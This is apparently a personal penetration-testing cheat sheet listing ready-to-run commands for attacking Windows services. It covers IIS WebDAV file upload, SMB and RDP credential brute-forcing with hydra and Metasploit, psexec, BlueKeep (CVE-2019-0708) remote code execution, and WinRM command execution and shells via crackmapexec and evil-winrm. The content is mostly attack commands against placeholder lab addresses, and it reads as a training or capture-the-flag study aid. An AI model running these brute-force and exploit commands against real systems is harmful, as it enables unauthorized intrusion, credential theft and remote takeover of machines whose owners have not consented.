rootđź’€bl4ck4non-sec:~#

Hack. Eat. Sleep. Repeat!!!

View on GitHub

Exploiting Microsoft IIS WebDav

Typically configured to run on port 80/443

supported executable file extensions

  1. .asp
  2. .aspx
  3. .config
  4. .php

WebDav(Web-Based Distributed Authoring and Versioning) is a set of extensions to the HTTP protocol which allows users to collaboratively edit and manage files on remote web servers

Tools

  1. davtest - used to scan, authenticate and exploit a webdav server. Comes preinstalled on kali
  2. cadaver - this supports file upload, download on screen display. comes preinstalled on kali

commands To upload to webdav using cadaver

cadaver http://10.10.10.10/webdav

To use metasploit to exploit webdav

use exploit/windows/iis/iis_webdav_upload_asp
set HttpUsername
set HttpPassword
set RHOSTS
set PATH /webdav/metasploit%RAND%.asp

wordlist to use when bruteforcing for username and password for services

/usr/share/metasploit-framework/data/wordlists/common_users.txt
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

using metasploit to bruteforce for smb

use auxiliary/scanner/smb/smb_login
set verbose false
set stop_on_success false
set RHOSTS
set USER_FILE
set PASS_FILE

Exploiting smb with psexec

// a password is needed
psexec.py username@10.10.10.10 cmd.exe

Exploiting smb with psexec for metasploit

use exploit/windows/smb/psexec
set RHOSTS
set SMBuser
set SMBPass

cve for eternal blue is cve-2017-0144

Exploiting RDP

RDP(Remote Desktop Protocol), used to remotely connect and interact with a windows system. Runs on port 3389 but can also be configured to run on any other tcp port

Using metasploit to scan rdp

use auxiliary/scanner/rdp/rdp_scanner 
set RPORT (to the port you are unsure of that is running rdp)

bruteforcing for rdp creds

hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.10.10.10:3333 -t 16

To connect to rdp

xfreerdp /u:administrator /p:qwertyuiop /v:10.10.10.10:3333

Exploiting windows CVE-2019-0708 RDP Vulnerability(BlueKeep)

Microsoft this vulnerability in May 2019. The attacker gain access to a chunk of kernel memory consequently allowing them to remotely execute arbitrary code at the system level without authentication

Using metasploit to exploit it, this is to check if it is vulnerable

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
SET RHOSTS 
run

Using metasploit to exploit

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS
show targets
set target

Exploiting WinRm

WinRm(Windows Remote Management) this can be used to facilitate remote access with windows systems or HTTP(s). This uses TCP port 5985 and 5986(HTTPS)

crackmapexec can be used to perform brute-force on WinRm in order to identify users and their passwords as well as execute commands on the target system

A ruby script called “evil-winrm” can be utilized to obtain a command shell session on the target system

Using crackmapexec (username is mostly administrator)

crackmapexec winrm 10.10.10.10 -u username -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

using crackmapexec to run arbitrary commands

crackmapexec winrm 10.10.10.10 -u usermane -p password -x

To get a reverse shell, we’ll be using evil-winrm which is a ruby script

evil-winrm.rb -u username -p 'password' -i 10.10.10.10

Using Metasploit

use exploit/windows/winrm/winrm_script_exec
set RHOSTS
set FORCE_VBS true
set username
set password